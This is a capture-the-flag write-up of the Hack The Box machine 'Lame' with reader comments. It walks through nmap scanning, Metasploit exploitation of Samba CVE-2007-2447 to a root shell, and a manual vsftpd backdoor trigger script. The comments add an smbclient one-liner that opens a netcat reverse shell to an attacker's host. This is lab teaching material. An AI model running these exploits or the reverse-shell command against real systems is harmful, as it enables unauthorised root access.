I will be covering write-ups of all retired machines, so stay tuned for future posts!
As always, let's start by enumerating running services on the target:
nmap -T4 -A -v 10.10.10.3
Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-17 15:29 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:29
Completed NSE at 15:29, 0.00s elapsed
Initiating NSE at 15:29
Completed NSE at 15:29, 0.00s elapsed
Initiating Ping Scan at 15:29
Scanning 10.10.10.3 [4 ports]
Completed Ping Scan at 15:29, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:29
Completed Parallel DNS resolution of 1 host. at 15:29, 0.02s elapsed
Initiating SYN Stealth Scan at 15:29
Scanning 10.10.10.3 [1000 ports]
Discovered open port 22/tcp on 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 139/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3
Completed SYN Stealth Scan at 15:29, 11.30s elapsed (1000 total ports)
Initiating Service scan at 15:29
Scanning 4 services on 10.10.10.3
Completed Service scan at 15:29, 11.36s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.3
Retrying OS detection (try #2) against 10.10.10.3
Initiating Traceroute at 15:29
Completed Traceroute at 15:29, 0.13s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:29
Completed Parallel DNS resolution of 2 hosts. at 15:29, 0.02s elapsed
NSE: Script scanning 10.10.10.3.
Initiating NSE at 15:29
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 15:30, 40.10s elapsed
Initiating NSE at 15:30
Completed NSE at 15:30, 0.00s elapsed
Nmap scan report for 10.10.10.3
Host is up (0.12s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Arris TG862G/CT cable modem (91%), Dell Integrated Remote Access Controller (iDRAC6) (91%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (91%), Linux 2.4.21 - 2.4.31 (likely embedded) (91%), Linux 2.4.27 (91%), Citrix XenServer 5.5 (Linux 2.6.18) (91%), Linux 2.6.22 (91%), Linux 2.6.8 - 2.6.30 (91%), Dell iDRAC 6 remote access controller (Linux 2.6) (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 2.311 days (since Fri Sep 15 08:02:47 2017)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=206 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2017-09-17T14:57:26-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 123.67 ms 10.10.14.1
2 123.15 ms 10.10.10.3
So we have vsFTPd 2.3.4 with anonymous login allowed, OpenSSH 4.7p1, and Samba 3.0.20 (the generic "3.X - 4.X" guess on 139 and the exact "3.0.20-Debian" on 445 are the same daemon).
Metasploit has some neat auxiliary modules for enumerating Samba. Let's check which named pipes are exposed; with no SMBUser/SMBPass set the module uses a null session, so anything it lists is reachable without credentials.
msf > use auxiliary/scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor) > show options
Module options (auxiliary/scanner/smb/pipe_auditor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(pipe_auditor) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf auxiliary(pipe_auditor) > run
[*] 10.10.10.3:139 - Pipes: \netlogon, \lsarpc, \samr, \eventlog, \lsass, \ntsvcs, \srvsvc, \wkssvc
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Right off the bat, a quick search for vsFTPd 2.3.4 turns up the well-known backdoor: for a few days in mid-2011 the 2.3.4 source tarball on the official download site was replaced with a tampered copy in which a USER name containing ":)" makes the daemon open a root shell on TCP/6200. The version banner alone does not tell you whether a given install was built from the tainted tarball, so it has to be tested, and wouldn't you know, there is a Metasploit module for it.
exploit/unix/ftp/vsftpd_234_backdoor
msf auxiliary(smb_version) > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(vsftpd_234_backdoor) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
Darn, no luck. The module sends the ":)" trigger and then looks for a shell on TCP/6200; nothing appears, so this build does not carry the backdoor. Logging in as the anonymous FTP user gets us nowhere either: we are chrooted into an empty directory.
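For anyone who wants to reproduce what the module just did without Metasploit, here is the same check as an added shell example (not code from the original write-up). It assumes nc is on PATH with -w and -z support and takes the target IP as its argument; a backdoored build answers the ":)" USER name by opening a shell on TCP/6200, a clean build answers with nothing:

```sh
#!/bin/sh
# Added example: manual check for the vsftpd 2.3.4 ":)" backdoor.
# Assumptions: nc (netcat) on PATH supporting -w and -z; target IP passed as $1.

# Pull the version out of an FTP greeting such as "220 (vsFTPd 2.3.4)".
# Prints nothing if the banner is not a vsFTPd banner.
ftp_version_from_banner() {
  printf '%s\n' "$1" | sed -n 's/.*vsFTPd \([0-9][0-9.]*\).*/\1/p'
}

# The tainted build watches the USER command for the two bytes ":)" and, when
# it sees them, forks a shell listening on TCP/6200. A clean 2.3.4 ignores the
# name, which is exactly what "no session was created" above means.
trigger_vsftpd_backdoor() {
  target=$1

  # Grab the greeting first so the report shows what the server claims to be.
  banner=$(printf 'QUIT\r\n' | nc -w 3 "$target" 21 | head -n 1)
  ver=$(ftp_version_from_banner "$banner")
  echo "banner: $banner (version ${ver:-unknown})"

  # Send the trigger. The login is expected to fail; only the USER line matters.
  printf 'USER anyname:)\r\nPASS anypass\r\n' | nc -w 3 "$target" 21 >/dev/null 2>&1
  sleep 2

  # A backdoored daemon is now listening on 6200.
  if nc -z -w 3 "$target" 6200 2>/dev/null; then
    echo "TCP/6200 is open: backdoored build, connect with: nc $target 6200"
    return 0
  fi
  echo "TCP/6200 is closed: banner says ${ver:-unknown} but this build is not backdoored"
  return 1
}

# usage: trigger_vsftpd_backdoor 10.10.10.3
```

Note that the backdoor listener is a plain bind shell with no authentication, so on a genuinely backdoored host anyone who can reach 6200 after the trigger gets root, not just the person who sent it.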
Another quick search for Samba 3.0.20 reveals CVE-2007-2447, an unauthenticated RCE affecting Samba 3.0.0 through 3.0.25rc3. It only applies when the non-default "username map script" option is set in smb.conf: smbd then passes the username from the session setup to /bin/sh without sanitising it, so shell metacharacters in the name (backticks) are executed with smbd's privileges, which is root. Metasploit conveniently has a module for this as well, so let's give it a shot.
exploit/multi/samba/usermap_script
msf exploit(vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(usermap_script) > run
[*] Started reverse TCP double handler on 10.10.14.3:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 0MefBteS03VkpAjA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "0MefBteS03VkpAjA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.3:55479) at 2017-09-17 15:52:35 -0400
pwd
/
whoami
root
Bingo! The shell is root straight away, because smbd runs as root and the injected command inherits its privileges, so no privilege escalation step is needed. From here we just grab our flags from /home/makis/user.txt and /root/root.txt.
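To see why a username alone is enough for code execution here, the following is an added example (not the author's code, and not Samba's source): it models the command-string construction that pre-3.0.25 smbd used for the non-default "username map script" option, with echo standing in for the mapping script (the script path in the comment is an assumption), and puts the hardened argv form next to it. The "/=" prefix on the payload is the same one the Metasploit module uses.

```sh
#!/bin/sh
# Added example: the CVE-2007-2447 injection, modelled offline.
# The vulnerable deployment has something like this in smb.conf:
#     [global]
#     username map script = /etc/samba/scripts/mapuser.sh   # path is an assumption
# Pre-3.0.25 smbd built one string, script "username", and handed it to /bin/sh -c,
# so anything the shell treats specially inside the name runs before the mapping
# script ever sees it. "echo" stands in for the mapping script so this runs anywhere.
MAP_SCRIPT=echo

# Vulnerable construction: the name is interpolated into a command string that a
# second shell re-parses, so backticks in it are command substitutions.
vulnerable_map_username() {
  user=$1
  sh -c "$MAP_SCRIPT \"$user\""
}

# Hardened construction: the name is one argv element, passed through unchanged.
# No shell sees it, so metacharacters are just bytes in a string.
hardened_map_username() {
  user=$1
  "$MAP_SCRIPT" "$user"
}

# Constructed payload in the shape the Metasploit module sends: "/=" followed by a
# backtick-wrapped command. Single quotes keep it literal on our side; the point
# is that the *server* side should never re-parse it.
PAYLOAD_USER='/=`echo INJECTED`'

echo "vulnerable: $(vulnerable_map_username "$PAYLOAD_USER")"   # /=INJECTED  (the command ran)
echo "hardened:   $(hardened_map_username "$PAYLOAD_USER")"     # /=`echo INJECTED`  (literal)
```

The same quoting lesson applies when you reproduce the exploit by hand: if the payload username is wrapped in double quotes on your own command line, your local shell performs the substitution and the backticks never reach the target, which is the failure mode a few commenters below ran into.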
Comments
Nice one dude thanks for sharing
And for those who like to do things manually, or aren't allowed to use Metasploit:
smbclient -U '/=`nohup nc -e /bin/sh LHOST LPORT`' -N -I 10.10.10.3 //LAME/tmp
Nice write-up @Arrexel, you can also do this to pinpoint and see if it is vulnerable to SMB vulns:
nmap -T4 -sS -sC -Pn -A --script smb-vuln* 10.10.10.3
great write up
Thumbs up to both of you
Can you please provide the "manual exploitation (exploit db exploit) process" as well for all of your tutorials??
Yea I will be adding that to them all from now on, will fix lame/legacy after I finish my next one.
Awesome thanks @Arrexel
Thanks for the tip, and thanks @Arrexel for the tutorials! I had been trying to make it work manually without luck.
The Metasploit module seems to use an SMB client implementation that sets up the session without NTLM. I can't seem to find the switch on smbclient that allows me to simulate that handshake (NT LANMAN 1.0), and have tried all --max-protocol options.
I'm simply trying to ping my machine before getting onto the reverse shell part, but I can't seem to trigger the payload. Can you please confirm if your command above works for you?
Thanks, and keep up the good work guys.
PS: I'm aware the displayed command is HTML-encoded.
@ps3tsuneo Those html entities didn't show up before. Anyway I uploaded the commands here (I had tested them and they worked): https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Lame/lame.txt
Thanks a lot @alamot! I did manage to make it work yesterday. Don't know if the problem was with my setup, but in case it helps others, I did have to tweak the smbclient settings a bit to disable SPNEGO.
Also had to modify the command a bit to append a "." at the beginning (smbclient -U './=`nohup nc -e /bin/sh LHOST LPORT`' -N -I 10.10.10.3 -p 139 //LAME/tmp).
Thanks for your quick reply!
This one returns:
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
why?
Can you please explain how you disabled spnego?
--option="client use spnego = no" not working here
I disabled it in /etc/samba/smb.conf, rebooted Kali and still not working
I am new so sorry if this too noob of a question.
The msf's smb/pipe_auditor shows me different output than what you have in the write-up. Here's what it looks like.
msf auxiliary(scanner/smb/pipe_auditor) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/pipe_auditor) >
What am I doing wrong here?
Thanks.
"client use spnego = no" in the smb.conf file does not work for me either... the result of the connection is the following:
If no "client use spnego = no" setting is set, the result is:
Ok, found another (almost the same) manual way which worked for me:
Setup listener:
Connect to the Lame using Smbclient:
Execute payload within SMB session:
Done. You should receive the connection to your listener:
The aggressive scan from Nmap (also known as -A) is the same thing as -sC -sV --traceroute, but it may change in the future (according to the Nmap docs). So you do not need to specify -sC at the command line when -A is present.
Show +respect to who helped you out!

https://www.hackthebox.eu/home/users/profile/61374
You could also use RCE on port 3632 and get a user this way. I did privesc with firefart but I'm sure there are many other ways to get root.
OSCP
Twitter : https://twitter.com/N0Fix | CTF team website : https://sentrywhale.com/
Hey! I am not getting any results by the Nmap command. It says that the host is down, if it is up then use -Pn. I used that too but not getting anything. I am doing this for the first time. Do we have to use any VPN (from Access tab of HTB) to do this? I am on a Wi-Fi.
Are you able to reach other IPs? If not, then vpn issue. Are you vip member?
Reset the box and try...
I am able to reach any IPs outside HTB by nmap. When I try to probe any IP inside HTB retired machines, it fails.
I just straightaway started firing nmap on 10.10.10.3 from my terminal. I am playing as an individual and not a participant of any lab. Is there some pre-configuration that I need to do in HTB or my local machine?
@Nofix said:
I also used the MSF exploit for port 3632; later I used nmap --interactive.
@azasdf74M said:
I used an nmap script for RCE and then uploaded a shell via wget RCE and spotted the nmap issue right away.